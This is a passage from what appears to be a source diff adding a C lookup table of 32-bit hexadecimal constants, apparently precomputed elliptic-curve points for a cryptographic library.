UINT32_C(0xBA2D4FDC), UINT32_C(0x74817CEC), UINT32_C(0xFA6CD4AF), ++ UINT32_C(0xC528EAD6), UINT32_C(0x9E7FB523), UINT32_C(0x7714B10E), ++ UINT32_C(0xAED781FF), UINT32_C(0x94F04455), UINT32_C(0xB52BB592) } }, ++ { { UINT32_C(0x868CC68B), UINT32_C(0xA578BD69), UINT32_C(0x603F2C08), ++ UINT32_C(0xA40FDC8D), UINT32_C(0x2D81B042), UINT32_C(0x53D79BD1), ++ UINT32_C(0xA7587EAB), UINT32_C(0x1B136AF3), UINT32_C(0x868A16DB), ++ UINT32_C(0x1ED4F939), UINT32_C(0xD0B98273), UINT32_C(0x775A61FB) }, ++ { UINT32_C(0xE56BEF8C), UINT32_C(0xBA5C12A6), UINT32_C(0xDDDC8595), ++ UINT32_C(0xF926CE52), UINT32_C(0x586FE1F8), UINT32_C(0xA13F5C8F), ++ UINT32_C(0x060DBB54), UINT32_C(0xEAC9F7F2), UINT32_C(0x51AF4342), ++ UINT32_C(0x70C0AC3A), UINT32_C(0x79CDA450), UINT32_C(0xC16E303C) } }, ++ { { UINT32_C(0x8113F4EA), UINT32_C(0xD0DADD6C), UINT32_C(0x07BDF09F), ++ UINT32_C(0xF14E3922), UINT32_C(0xAA7D877C), UINT32_C(0x3FE5E9C2), ++ UINT32_C(0x48779264), UINT32_C(0x9EA95C19), UINT32_C(0x4FCB8344), ++ UINT32_C(0xE93F65A7), UINT32_C(0x76D925A4), UINT32_C(0x9F40837E) }, ++ { UINT32_C(0x8271FFC7), UINT32_C(0x0EA6DA3F), UINT32_C(0xCC8F9B19), ++ UINT32_C(0x557FA529), UINT32_C(0x78E6DDFD), UINT32_C(0x2613DBF1), ++ UINT32_C(0x36B1E954), UINT32_C(0x7A7523B8), UINT32_C(0x406A87FB), ++ UINT32_C(0x20EB3168), UINT32_C(0x03ABA56A), UINT32_C(0x64C21C14) } }, ++ { { UINT32_C(0xC032DD5F), UINT32_C(0xE86C9C2D), UINT32_C(0x86F16A21), ++ UINT32_C(0x158CEB8E), UINT32_C(0x68326AF1), UINT32_C(0x0279FF53), ++ UINT32_C(0x59F12BA5), UINT32_C(0x1FFE2E2B), UINT32_C(0x86826D45), ++ UINT32_C(0xD75A46DB), UINT32_C(0x1E33E6AC), UINT32_C(0xE19B4841) }, ++ { UINT32_C(0x0E52991C), UINT32_C(0x5F0CC524), UINT32_C(0x8B116286), ++ UINT32_C(0x645871F9), UINT32_C(0xFCAEC5D3), UINT32_C(0xAB3B4B1E), ++ UINT32_C(0x51D0F698), UINT32_C(0x994C8DF0), UINT32_C(0xE5D13040), ++ UINT32_C(0x06F890AF), UINT32_C(0x5F96C7C2), UINT32_C(0x72D9DC23) } }, ++ { { UINT32_C(0xE7886A80), UINT32_C(0x7C018DEE), UINT32_C(0x8786E4A3), ++ UINT32_C(0xFA209330), UINT32_C(0xA4415CA1), UINT32_C(0xCEC8E2A3), ++ UINT32_C(0xCC83CC60), UINT32_C(0x5C736FC1), UINT32_C(0xF00C259F), ++ UINT32_C(0xFEF9788C), UINT32_C(0xDD29A6AD), UINT32_C(0xED5C01CB) }, ++ { UINT32_C(0x3E20825B), UINT32_C(0x87834A03), UINT32_C(0x123F9358), ++ UINT32_C(0x13B1239D), UINT32_C(0xFBC286C1), UINT32_C(0x7E8869D0), ++ UINT32_C(0x24CE8609), UINT32_C(0xC4AB5AA3), UINT32_C(0xB6349208), ++ UINT32_C(0x38716BEE), UINT32_C(0xB322AE21), UINT32_C(0x0BDF4F99) } }, ++ { { UINT32_C(0x53E3494B), UINT32_C(0x6B97A2BF), UINT32_C(0x70F7A13E), ++ UINT32_C(0xA8AA05C5), UINT32_C(0xF1305B51), UINT32_C(0x209709C2), ++ UINT32_C(0xDAB76F2C), UINT32_C(0x57B31888), UINT32_C(0xAA2A406A), ++ UINT32_C(0x75B2ECD7), UINT32_C(0xA35374A4), UINT32_C(0x88801A00) }, ++ { UINT32_C(0x45C0471B), UINT32_C(0xE1458D1C), UINT32_C(0x322C1AB0), ++ UINT32_C(0x5760E306), UINT32_C(0xAD6AB0A6), UINT32_C(0x789A0AF1), ++ UINT32_C(0xF458B9CE), UINT32_C(0x74398DE1), UINT32_C(0x32E0C65F), ++ UINT32_C(0x1652FF9F), UINT32_C(0xFFFB3A52), UINT32_C(0xFAF1F9D5) } }, ++ }, ++ { ++ { { UINT32_C(0xD1D1B007), UINT32_C(0xA05C751C), UINT32_C(0x0213E478), ++ UINT32_C(0x016C213B), UINT32_C(0xF4C98FEE), UINT32_C(0x9C56E26C), ++ UINT32_C(0xE7B3A7C7), UINT32_C(0x6084F8B9), UINT32_C(0xDECC1646), ++ UINT32_C(0xA0B042F6), UINT32_C(0xFBF3A0BC), UINT32_C(0x4A6F3C1A) }, ++ { UINT32_C(0x51C9F909), UINT32_C(0x94524C2C), UINT32_C(0x3A6D3748), ++ UINT32_C(0xF3B3AD40), UINT32_C(0x7CE1F9F5), UINT32_C(0x18792D6E), ++ UINT32_C(0xFC0C34FA), UINT32_C(0x8EBC2FD7), UINT32_C(0x780A1693), ++ UINT32_C(0x032A9F41), UINT32_C(0x56A60019), UINT32_C(0x34F9801E) } }, ++ { { UINT32_C(0xF0DB3751), UINT32_C(0xB398290C), UINT32_C(0xBA42C976), ++ UINT32_C(0x01170580), UINT32_C(0x56560B89), UINT32_C(0x3E71AA29), ++ UINT32_C(0x50E6647B), UINT32_C(0x80817AAC), UINT32_C(0xA0BE42DA), ++ UINT32_C(0x35C833AD), UINT32_C(0xF1BABA4E), UINT32_C(0xFA3C6148) }, ++ { UINT32_C(0xCD8F6253), UINT32_C(0xC57BE645), UINT32_C(0xC657AD0D), ++ UINT32_C(0x77CEE46B), UINT32_C(0x0DEFD908), UINT32_C(0x83007731), ++ UINT32_C(0x899CBA56), UINT32_C(0x92FE9BCE), UINT32_C(0xBCEFFB5A), ++ UINT32_C(0x48450EC4), UINT32_C(0xF2F5F4BF), UINT32_C(0xE615148D) } }, ++ { { UINT32_C(0x90B86166), UINT32_C(0xF55EDABB), UINT32_C(0x075430A2), ++ UINT32_C(0x27F7D784), UINT32_C(0x9BF17161), UINT32_C(0xF53E822B), ++ UINT32_C(0xAFE808DC), UINT32_C(0x4A5B3B93), UINT32_C(0xD7272F55), ++ UINT32_C(0x590BBBDE), UINT32_C(0xEAEA79A1), UINT32_C(0x233D63FA) }, ++ { UINT32_C(0xFE1EBA07), UINT32_C(0xD7042BEA), UINT32_C(0x10750D7E), ++ UINT32_C(0xD2B9AEA0), UINT32_C(0x31078AA5), UINT32_C(0xD8D1E690), ++ UINT32_C(0x7E37BC8B), UINT32_C(0x9E837F18), UINT32_C(0x85008975), ++ UINT32_C(0x9558FF4F), UINT32_C(0x421FE867), UINT32_C(0x93EDB837) } }, ++ { { UINT32_C(0x83D55B5A), UINT32_C(0xAA6489DF), UINT32_C(0x86BF27F7), ++ UINT32_C(0xEA092E49), UINT32_C(0x5FA2EFEC), UINT32_C(0x4D8943A9), ++ UINT32_C(0x720E1A8C), UINT32_C(0xC9BAAE53), UINT32_C(0x95A4F8A3), ++ UINT32_C(0xC055444B), UINT32_C(0xA7C1206B), UINT32_C(0x93BD01E8) }, ++ { UINT32_C(0x714A27DF), UINT32_C(0xD97765B6), UINT32_C(0x193F1B16), ++ UINT32_C(0xD622D954), UINT32_C(0xF1503B15), UINT32_C(0x115CC35A), ++ UINT32_C(0xA9FA21F8), UINT32_C(0x1DD5359F), UINT32_C(0x6DFED1F1), ++ UINT32_C(0x197C3299), UINT32_C(0xF77F2679), UINT32_C(0xDEE8B7C9) } }, ++ { { UINT32_C(0x394FD855), UINT32_C(0x5405179F), UINT32_C(0x49FDFB33), ++ UINT32_C(0xC9D6E244), UINT32_C(0xBD903393), UINT32_C(0x70EBCAB4), ++ UINT32_C(0xA2C56780), UINT32_C(0x0D3A3899), UINT32_C(0x683D1A0A), ++ UINT32_C(0x012C7256), UINT32_C(0x80A48F3B), UINT32_C(0xC688FC88) }, ++ { UINT32_C(0x6F7DF527), UINT32_C(0x18095754), UINT32_C(0x71315D16), ++ UINT32_C(0x9E339B4B), UINT32_C(0xA956BB12), UINT32_C(0x90560C28), ++ UINT32_C(0xD42EEE8D), UINT32_C(0x2BECEA60), UINT32_C(0x50632653), ++ UINT32_C(0x82AEB9A7), UINT32_C(0xDFA5CD6A), UINT32_C(0xED34353E) } }, ++ { { UINT32_C(0x91AECCE4), UINT32_C(0x82154D2C), UINT32_C(0x5041887F), ++ UINT32_C(0x312C6070), UINT32_C(0xFB9FBD71), UINT32_C(0xECF589F3), ++ UINT32_C(0xB524BDE4), UINT32_C(0x67660A7D), UINT32_C(0x724ACF23), ++ UINT32_C(0xE99B029D), UINT32_C(0x6D1CD891), UINT32_C(0xDF06E4AF) }, ++ { UINT32_C(0x80EE304D), UINT32_C(0x07806CB5), UINT32_C(0x7443A8F8), ++ UINT32_C(0x0C70BB9F), UINT32_C(0x08B0830A), UINT32_C(0x01EC3414), ++ UINT32_C(0x5A81510B), UINT32_C(0xFD7B63C3), UINT32_C(0x453B5F93), ++ UINT32_C(0xE90A0A39), UINT32_C(0x9BC71725), UINT32_C(0xAB700F8F) } }, ++ { { UINT32_C(0xB9F00793), UINT32_C(0x9401AEC2), UINT32_C(0xB997F0BF), ++ UINT32_C(0x064EC4F4), UINT32_C(0x849240C8), UINT32_C(0xDC0CC1FD), ++ UINT32_C(0xB6E92D72), UINT32_C(0x39A75F37), UINT32_C(0x0224A4AB), ++ UINT32_C(0xAA43CA5D), UINT32_C(0x54614C47), UINT32_C(0x9C4D6325) }, ++ { UINT32_C(0xC6709DA3), UINT32_C(0x1767366F), UINT32_C(0x23479232), ++ UINT32_C(0xA6B482D1), UINT32_C(0x84D63E85), UINT32_C(0x54DC6DDC), ++ UINT32_C(0xC99D3B9E), UINT32_C(0x0ACCB5AD), UINT32_C(0xE8AA3ABF), ++ UINT32_C(0x211716BB), UINT32_C(0x69EC6406), UINT32_C(0xD0FE25AD) } }, ++ { { UINT32_C(0xDF85C705), UINT32_C(0x0D5C1769), UINT32_C(0xA409DCD1), ++ UINT32_C(0x7086C93D), UINT32_C(0x0E8D75D8), UINT32_C(0x9710839D), ++ UINT32_C(0xEBDD4177), UINT32_C(0x17B7DB75), UINT32_C(0xF649A809), ++ UINT32_C(0xAF69EB58), UINT32_C(0x8A84E220), UINT32_C(0x6EF19EA2) }, ++ { UINT32_C(0x65C278B2), UINT32_C(0x36EB5C66), UINT32_C(0x81EA9D65), ++ UINT32_C(0xD2A15128), UINT32_C(0x769300AD), UINT32_C(0x4FCBA840), ++ UINT32_C(0xC8E536E5), UINT32_C(0xC2052CCD), UINT32_C(0xAC263B8F), ++ UINT32_C(0x9CAEE014), UINT32_C(0xF9239663), UINT32_C(0x56F7ED7A) } }, ++ { { UINT32_C(0xAC9E09E1), UINT32_C(0xF6FA251F), UINT32_C(0x955A2853), ++ UINT32_C(0xA3775605), UINT32_C(0xF2A4BD78), UINT32_C(0x977B8D21), ++ UINT32_C(0x3E096410), UINT32_C(0xF68AA7FF), UINT32_C(0x65F88419), ++ UINT32_C(0x01AB0552), UINT32_C(0xBB93F64E), UINT32_C(0xC4C8D77E) }, ++ { UINT32_C(0x3451FE64), UINT32_C(0x71825111), UINT32_C(0x46F9BAF0), ++ UINT32_C(0xFA0F905B), UINT32_C(0xCA49EF1A), UINT32_C(0x79BE3BF3), ++ UINT32_C(0x6CB02071), UINT32_C(0x831109B2), UINT32_C(0xC4DDBFE5), ++ UINT32_C(0x765F935F), UINT32_C(0x80E5A3BA), UINT32_C(0x6F99CD14) } }, ++ { { UINT32_C(0x234F91FF), UINT32_C(0xD2E8DA04), UINT32_C(0x813867AA), ++ UINT32_C(0x4DED4D6D), UINT32_C(0xE0A0D945), UINT32_C(0x3B50175D), ++ UINT32_C(0x4EB78137), UINT32_C(0x55AC7406), UINT32_C(0xE1D47730), ++ UINT32_C(0xE9FA7F6E), UINT32_C(0x5CBF2176), UINT32_C(0x2C171531) }, ++ { UINT32_C(0x2BE7A47D), UINT32_C(0xA521788F), UINT32_C(0x3FCF1AB3), ++ UINT32_C(0x95B15A27), UINT32_C(0xF28A946A), UINT32_C(0xAADA6401), ++ UINT32_C(0x8B4E898B), UINT32_C(0x628B2EF4), UINT32_C(0x6D6592CC), ++ UINT32_C(0x0E6F4629), UINT32_C(0xA723CADD), UINT32_C(0x997C7094) } }, ++ { { UINT32_C(0x6AFE80C6), UINT32_C(0x878BCE11), UINT32_C(0x007BBA38), ++ UINT32_C(0xA89ABC9D), UINT32_C(0xA7CC267F), UINT32_C(0xB0C1F87B), ++ UINT32_C(0x5104FF04), UINT32_C(0x86D33B9D), UINT32_C(0x2EF1BA42), ++ UINT32_C(0xB0504B1B), UINT32_C(0xB2827E88), UINT32_C(0x21693048) }, ++ { UINT32_C(0x79CFCD14), UINT32_C(0x11F1CCD5), UINT32_C(0x94AD227E), ++ UINT32_C(0x59C09FFA), UINT32_C(0x3EA91ACF), UINT32_C(0x95A4ADCB), ++ UINT32_C(0xB4370BAA), UINT32_C(0x1346238B), UINT32_C(0x3E1367B0), ++ UINT32_C(0xB099D202), UINT32_C(0x90F23CEA), UINT32_C(0xCF5BBDE6) } }, ++ { { UINT32_C(0xBCB3BE5E), UINT32_C(0x453299BB), UINT32_C(0x38E9FF97), ++ UINT32_C(0x123C588E), UINT32_C(0xF6A2E521), UINT32_C(0x8C115DD9), ++ UINT32_C(0xFF7D4B98), UINT32_C(0x6E333C11), UINT32_C(0xDA73E736), ++ UINT32_C(0x9DD061E5), UINT32_C(0x5CA53056), UINT32_C(0xC6AB7B3A) }, ++ { UINT32_C(0x5B30A76B), UINT32_C(0xF1EF3EE3), UINT32_C(0x961BA11F), ++ UINT32_C(0xADD6B44A), UINT32_C(0x2CA6E030), UINT32_C(0x7BB00B75), ++ UINT32_C(0x2FE270AD), UINT32_C(0x270272E8), UINT32_C(0x241A9239), ++ UINT32_C(0x23BC6F4F), UINT32_C(0x0BB94A94), UINT32_C(0x88581E13) } }, ++ { { UINT32_C(0x24EEF67F), UINT32_C(0xBD225A69), UINT32_C(0x0412CEB7), ++ UINT32_C(0x7CFD9614), UINT32_C(0x99AC298E), UINT32_C(0xF6DE1679), ++ UINT32_C(0xED6C3571), UINT32_C(0xB20FD895), UINT32_C(0x61836C56), ++ UINT32_C(0x03C73B78), UINT32_C(0xABA6CB34), UINT32_C(0xEE3C3A16) }, ++ { UINT32_C(0x4138408A), UINT32_C(0x9E8C5667), UINT32_C(0x2DD6EBDF), ++ UINT32_C(0xEC25FCB1), UINT32_C(0xDBBDF6E3), UINT32_C(0xC54C33FD), ++ UINT32_C(0x4A3C9DD4), UINT32_C(0x93E0913B), UINT32_C(0x35EDEED4), ++ UINT32_C(0x66D7D135), UINT32_C(0x453FB66E), UINT32_C(0xD29A36C4) } }, ++ { { UINT32_C(0x9F1943AF), UINT32_C(0x7F192F03), UINT32_C(0x4E0B5FB0), ++ UINT32_C(0x6488163F), UINT32_C(0x53599226), UINT32_C(0x66A45C69), ++ UINT32_C(0x9AD15A73), UINT32_C(0x924E2E43), UINT32_C(0x42A99D76), ++ UINT32_C(0x8B553DB7), UINT32_C(0x0451F521), UINT32_C(0x4BC6B53B) }, ++ { UINT32_C(0x101F8AD6), UINT32_C(0xC029B5EF), UINT32_C(0xC507EED9), ++ UINT32_C(0x6A4DA71C), UINT32_C(0x30BB22F3), UINT32_C(0x3ADFAEC0), ++ UINT32_C(0xB514F85B), UINT32_C(0x81BCAF7A), UINT32_C(0x5A7E60D3), ++ UINT32_C(0x2E1E6EFF), UINT32_C(0xAE39D42F), UINT32_C(0x5270ABC0) } }, ++ { { UINT32_C(0x3901F0F8), UINT32_C(0x86D56DEB), UINT32_C(0xEED5F650), ++ UINT32_C(0x1D0BC792), UINT32_C(0xCA1114A3), UINT32_C(0x1A2DDFD8), ++ UINT32_C(0xF1DD316D), UINT32_C(0x94ABF4B1), UINT32_C(0x3D9F18EF), ++ UINT32_C(0xF72179E4), UINT32_C(0x9AA2CABF), UINT32_C(0x52A0921E) }, ++ { UINT32_C(0xA7452883), UINT32_C(0xECDA9E27), UINT32_C(0xAFD771B4), ++ UINT32_C(0x7E90850A), UINT32_C(0x9CC0465C), UINT32_C(0xD40F87EA), ++ UINT32_C(0x865CDA36), UINT32_C(0x8CFCB60A), UINT32_C(0x7C650942), ++ UINT32_C(0x3DBEC2CC), UINT32_C(0xE718CA9D), UINT32_C(0x071A4EE7) } }, ++ { { UINT32_C(0x276AC5F3), UINT32_C(0x73C0E4FF), UINT32_C(0xBDB97EA1), ++ UINT32_C(0xE7BA5A6A), UINT32_C(0xC5808398), UINT32_C(0x638CA54E), ++ UINT32_C(0x413855E5), UINT32_C(0x8258DC82), UINT32_C(0x57F07614), ++ UINT32_C(0x35DDD2E9), UINT32_C(0x1DC13BF9), UINT32_C(0xF98DD692) }, ++ { UINT32_C(0xF16DCD84), UINT32_C(0x3A4C0088), UINT32_C(0x833D83F9), ++ UINT32_C(0xF192EADD), UINT32_C(0xA6D61D29), UINT32_C(0x3C26C931), ++ UINT32_C(0xDE0AD7A1), UINT32_C(0x589FDD52), UINT32_C(0x0442D37F), ++ UINT32_C(0x7CD83DD2), UINT32_C(0x403ECBFC), UINT32_C(0x1E47E777) } }, ++ }, ++ { ++ { { UINT32_C(0x70D4D7BC), UINT32_C(0x2AF8ED81), UINT32_C(0xB632435C), ++ UINT32_C(0xABC3E15F), UINT32_C(0x78219356), UINT32_C(0x4C0E726F), ++ UINT32_C(0xB87254C4), UINT32_C(0x8C1962A1), UINT32_C(0xC9E7691A), ++ UINT32_C(0x30796A71), UINT32_C(0xA75A12EE), UINT32_C(0xD453EF19) }, ++ { UINT32_C(0x13AE4964), UINT32_C(0x535F42C2), UINT32_C(0x0DA9586A), ++ UINT32_C(0x86831C3C), UINT32_C(0xE39A7A58), UINT32_C(0xB7F1EF35), ++ UINT32_C(0xD459B91A), UINT32_C(0xA2789AE2), UINT32_C(0x02FD429D), ++ UINT32_C(0xEADBCA7F), UINT32_C(0x65290F57), UINT32_C(0x94F215D4) } }, ++ { { UINT32_C(0x1CFB79AC), UINT32_C(0x37ED2BE5), UINT32_C(0xE7AF84C3), ++ UINT32_C(0x801946F3), UINT32_C(0xE77C2F00), UINT32_C(0xB061AD8A), ++ UINT32_C(0x44DE16A8), UINT32_C(0xE87E1A9A), UINT32_C(0x7EE490FF), ++ UINT32_C(0xDF4F57C8), UINT32_C(0x005993ED), UINT32_C(0x4E793B49) }, ++ { UINT32_C(0xBCCB593F), UINT32_C(0xE1036387), UINT32_C(0x95E09B80), ++ UINT32_C(0xF1749411), UINT32_C(0x5AB42F91), UINT32_C(0x59CB20D1), ++ UINT32_C(0xAC0FF033), UINT32_C(0xA738A18D), UINT32_C(0x2AC1E7F4), ++ UINT32_C(0xDA501A2E), UINT32_C(0x84D8A6E0), UINT32_C(0x1B67EDA0) } }, ++ { { UINT32_C(0x1080E90B), UINT32_C(0x1D27EFCE), UINT32_C(0x3FD01DC6), ++ UINT32_C(0xA2815246), UINT32_C(0xCAA26D18), UINT32_C(0x99A3FB83), ++ UINT32_C(0xB82BABBE), UINT32_C(0xD27E6133), UINT32_C(0xD783DD60), ++ UINT32_C(0x61030DFD), UINT32_C(0x73C78CB8), UINT32_C(0x295A2913) }, ++ { UINT32_C(0x68BE6A92), UINT32_C(0x8707A2CF), UINT32_C(0xEEB3474A), ++ UINT32_C(0xC9C2FB98), UINT32_C(0xA2B176B8), UINT32_C(0x7C3FD412), ++ UINT32_C(0xC7202101), UINT32_C(0xD5B52E2F), UINT32_C(0xF0A6D536), ++ UINT32_C(0x24A63030), UINT32_C(0x04648EC0), UINT32_C(0x05842DE3) } }, ++ { { UINT32_C(0x30577AC9), UINT32_C(0x67477CDC), UINT32_C(0x244F92A8), ++ UINT32_C(0x51DD9775), UINT32_C(0x917EEC66), UINT32_C(0x31FD60B9), ++ UINT32_C(0xD66C5C1D), UINT32_C(0xACD95BD4), UINT32_C(0xBF9508BA), ++ UINT32_C(0x2E0551F3), UINT32_C(0x688CB243), UINT32_C(0x121168E1) }, ++ { UINT32_C(0x4540D230), UINT32_C(0x8C039740), UINT32_C(0x009ECDF9), ++ UINT32_C(0xC4ED3CF6), UINT32_C(0x44DB62AF), UINT32_C(0x191825E1), ++ UINT32_C(0xC4A030DA), UINT32_C(0x3EE8ACAB), UINT32_C(0x94081504), ++ UINT32_C(0x8AB154A8), UINT32_C(0x486C9CD0), UINT32_C(0x1FE09E4B) } }, ++ { { UINT32_C(0xD113450B), UINT32_C(0x512F82F9), UINT32_C(0x2DBC9197), ++ UINT32_C(0x5878C901), UINT32_C(0xE13F355B), UINT32_C(0xDB87412B), ++ UINT32_C(0x935B8A5E), UINT32_C(0x0A0A4A9B), UINT32_C(0xF25A5351), ++ UINT32_C(0x818587BD), UINT32_C(0x31E3D9C7), UINT32_C(0xE8079310) }, ++ { UINT32_C(0x611BC1B1), UINT32_C(0x8B1D47C7), UINT32_C(0x72A823F2), ++ UINT32_C(0x51722B58), UINT32_C(0x53B36B3E), UINT32_C(0x6F97EE8A), ++ UINT32_C(0x946DD453), UINT32_C(0x6E085AAC), UINT32_C(0xE65E6533), ++ UINT32_C(0x2EC5057D), UINT32_C(0x4BB18801), UINT32_C(0xF82D9D71) } }, ++ { { UINT32_C(0x8BA5AA8E), UINT32_C(0xAD81FA93), UINT32_C(0x8F7AA69E), ++ UINT32_C(0x723E628E), UINT32_C(0xEF35937C), UINT32_C(0x0BA7C2DE), ++ UINT32_C(0x6DECFB40), UINT32_C(0x83A43EC5), UINT32_C(0xE60C4F2D), ++ UINT32_C(0xF520F849), UINT32_C(0x457E3B5E), UINT32_C(0x8260E8AE) }, ++ { UINT32_C(0xBF1D9ED7), UINT32_C(0x7CE874F0), UINT32_C(0x7F1A5466), ++ UINT32_C(0x5FDE3553), UINT32_C(0x0C162DBB), UINT32_C(0x5A63777C), ++ UINT32_C(0xDAD87289), UINT32_C(0x0FD04F8C), UINT32_C(0x640761D5), ++ UINT32_C(0xCA2D9E0E), UINT32_C(0x38501ADB), UINT32_C(0x4615CFF8) } }, ++ { { UINT32_C(0x110B4A25), UINT32_C(0x9422789B), UINT32_C(0x70AD8CC1), ++ UINT32_C(0x5C26779F), UINT32_C(0xEC4F1E14), UINT32_C(0x4EE6A748), ++ UINT32_C(0x5C7AB5E0), UINT32_C(0xFB584A0D), UINT32_C(0xFB21EE66), ++ UINT32_C(0xED1DCB0B), UINT32_C(0x11C6863C), UINT32_C(0xDBED1F00) }, ++ { UINT32_C(0xB1B1D187), UINT32_C(0xD2969269), UINT32_C(0xAFE964E6), ++ UINT32_C(0xF7D0C3F2), UINT32_C(0x12BB865E), UINT32_C(0xE05EE93F), ++ UINT32_C(0xED79118E), UINT32_C(0x1AFB7BEE), UINT32_C(0x0F0FE453), ++ UINT32_C(0x220AF138), UINT32_C(0x52782AB9), UINT32_C(0x1463AA1A) } }, ++ { { UINT32_C(0xD7DBE5F9), UINT32_C(0x7C139D56), UINT32_C(0x0B83685B), ++ UINT32_C(0xFC16E611), UINT32_C(0x9018463C), UINT32_C(0xFA723C02), ++ UINT32_C(0x840BF5D7), UINT32_C(0xC472458C), UINT32_C(0x0AF07591), ++ UINT32_C(0x4D809359), UINT32_C(0x3308DFD9), UINT32_C(0x418D8830) }, ++ { UINT32_C(0x0C365AE3), UINT32_C(0x9B381E04), UINT32_C(0xF8190FD1), ++ UINT32_C(0x3780BF33), UINT32_C(0xDD03E854), UINT32_C(0x45397418), ++ UINT32_C(0x4E51E491), UINT32_C(0xA95D030F), UINT32_C(0xE3286CEA), ++ UINT32_C(0x87C8C686), UINT32_C(0x900B5F83), UINT32_C(0x01C773BF) } }, ++ { { UINT32_C(0x78673B02), UINT32_C(0xDABE3475), UINT32_C(0xF6E7395E), ++ UINT32_C(0x4F0F25CE), UINT32_C(0xD181AD45), UINT32_C(0x3117ABB9), ++ UINT32_C(0xAA13DE0B), UINT32_C(0x4B559F88), UINT32_C(0xEA7C9745), ++ UINT32_C(0xFD8EFE78), UINT32_C(0x5DD21682), UINT32_C(0x08060047) }, ++ { UINT32_C(0xD4C86FFC), UINT32_C(0xC0F5DE4B), UINT32_C(0xF21AB6A2), ++ UINT32_C(0x4BB14B1E), UINT32_C(0xF50C1D12), UINT32_C(0xACB53A6C), ++ UINT32_C(0x5CC9162E), UINT32_C(0x46AAC450), UINT32_C(0x2DE240B6), ++ UINT32_C(0x049C51E0), UINT32_C(0xE383C3B0), UINT32_C(0xBB2DC016) } }, ++ { { UINT32_C(0x8E438C92), UINT32_C(0xA3C56AD2), UINT32_C(0xB2CEAF1A), ++ UINT32_C(0x7C43F98F), UINT32_C(0xE2150778), UINT32_C(0x397C44F7), ++ UINT32_C(0x71A24131), UINT32_C(0x48D17AB7), UINT32_C(0x1E2ACDA9), ++ UINT32_C(0xCC513863), UINT32_C(0xF0C9BAC9), UINT32_C(0x2C76A55E) }, ++ { UINT32_C(0x7EA4BB7B), UINT32_C(0x4D74CDCE), UINT32_C(0xB1B3C2BA), ++ UINT32_C(0x834BD5BF), UINT32_C(0xCCC310A4), UINT32_C(0x46E2911E), ++ UINT32_C(0x0FC1BF13), UINT32_C(0xD3DE84AA), UINT32_C(0x80A03AD3), ++ UINT32_C(0x27F2892F), UINT32_C(0x3BD2F08B), UINT32_C(0x85B47620) } }, ++ { { UINT32_C(0x567AF533), UINT32_C(0xAB1CB818), UINT32_C(0xBAC2705A), ++ UINT32_C(0x273B4537), UINT32_C(0x22C84AB6), UINT32_C(0x133066C4), ++ UINT32_C(0x4830BFC1), UINT32_C(0xC3590DE6), UINT32_C(0x5E4742D0), ++ UINT32_C(0xEA297869), UINT32_C(0x4F3164C0), UINT32_C(0xF6D8C694) }, ++ { UINT32_C(0xC1249588), UINT32_C(0x09E85F3D), UINT32_C(0x4EC64DF7), ++ UINT32_C(0x6C2BB05D), UINT32_C(0x8B78000F), UINT32_C(0xD267115E), ++ UINT32_C(0xC7E4A316), UINT32_C(0x07C5D7AE), UINT32_C(0x4619E5BD), ++ UINT32_C(0xCB1187BA), UINT32_C(0xA43F7EEE), UINT32_C(0x57B1D4EF) } }, ++ { { UINT32_C(0xC8176A96), UINT32_C(0x3618891F), UINT32_C(0xE5808B97), ++ UINT32_C(0x62C4B084), UINT32_C(0x4DD95D6E), UINT32_C(0xDE558546), ++ UINT32_C(0x730B2EA4), UINT32_C(0x27A8133E), UINT32_C(0x6AF318A0), ++ UINT32_C(0xE07CEEC3), UINT32_C(0xCE24FD2C), UINT32_C(0x0ACC1286) }, ++ { UINT32_C(0xDD4D307C), UINT32_C(0x8A48FE4A), UINT32_C(0x18CDE0DA), ++ UINT32_C(0x71A9BA9C), UINT32_C(0xD5D79747), UINT32_C(0x655E2B66), ++ UINT32_C(0xA79AEDC7), UINT32_C(0x409FE856), UINT32_C(0xD287E5CF), ++ UINT32_C(0xC5A9F244), UINT32_C(0x4E82EC39), UINT32_C(0xCCE10384) } }, ++ { { UINT32_C(0xF25D364C), UINT32_C(0x00675BA7), UINT32_C(0x68D36BDF), ++ UINT32_C(0x7A7F1629), UINT32_C(0xA9E23F29), UINT32_C(0x35EC468A), ++ UINT32_C(0x2D926E6C), UINT32_C(0xF797AC50), UINT32_C(0x4B4F4376), ++ UINT32_C(0x639BA453), UINT32_C(0x51FF9519), UINT32_C(0xD71B430F) }, ++ { UINT32_C(0x2CF5635C), UINT32_C(0xB8C439EC), UINT32_C(0x81980393), ++ UINT32_C(0x0CE4C8D1), UINT32_C(0x64123B15), UINT32_C(0x4C5362A9), ++ UINT32_C(0xFFDCF096), UINT32_C(0x6E0421E0), UINT32_C(0x10D1F914), ++ UINT32_C(0x624A855F), UINT32_C(0x614DCD29), UINT32_C(0x7D8F3AB7) } }, ++ { { UINT32_C(0xB3493CE0), UINT32_C(0xD9219ADA), UINT32_C(0x52F09AE5), ++ UINT32_C(0x971B243A), UINT32_C(0xE24E3674), UINT32_C(0xC16C9BF8), ++ UINT32_C(0xCE68C7CD), UINT32_C(0x026D408D), UINT32_C(0x358209E3), ++ UINT32_C(0xF9B33DD9), UINT32_C(0xF3B2A206), UINT32_C(0x02D0595D) }, ++ { UINT32_C(0x60D15640), UINT32_C(0xBF994271), UINT32_C(0x15B5466A), ++ UINT32_C(0x6DA7A04E), UINT32_C(0x1CADB50D), UINT32_C(0x03AA4ED8), ++ UINT32_C(0x129A4253), UINT32_C(0x1548F029), UINT32_C(0xB842865A), ++ UINT32_C(0x41741F7E), UINT32_C(0xA3F88C98), UINT32_C(0x859FE0A4) } }, ++ { { UINT32_C(0x05FD7553), UINT32_C(0x80DE085A), UINT32_C(0xB897566B), ++ UINT32_C(0x4A4AB91E), UINT32_C(0x2F1C173F), UINT32_C(0x33BCD475), ++ UINT32_C(0xC100C013), UINT32_C(0x4E238896), UINT32_C(0xD614B34B), ++ UINT32_C(0x1C88500D), UINT32_C(0xC3BA9E23), UINT32_C(0x0401C5F6) }, ++ { UINT32_C(0xD0AF0DE5), UINT32_C(0x8E8003C4), UINT32_C(0x9D0DCBB9), ++ UINT32_C(0x19B1DFB5), UINT32_C(0xEBEF7AB6), UINT32_C(0x4A3640A9), ++ UINT32_C(0x959B15F6), UINT32_C(0xEDAFD65B), UINT32_C(0x7FB95821), ++ UINT32_C(0x8092EF7F), UINT32_C(0xCE2E45D1), UINT32_C(0xAB8DD52E) } }, ++ { { UINT32_C(0xB9CFE6BF), UINT32_C(0xD1F2D6B8), UINT32_C(0x00073F6F), ++ UINT32_C(0x6358810B), UINT32_C(0xD712106E), UINT32_C(0x5FCE5993), ++ 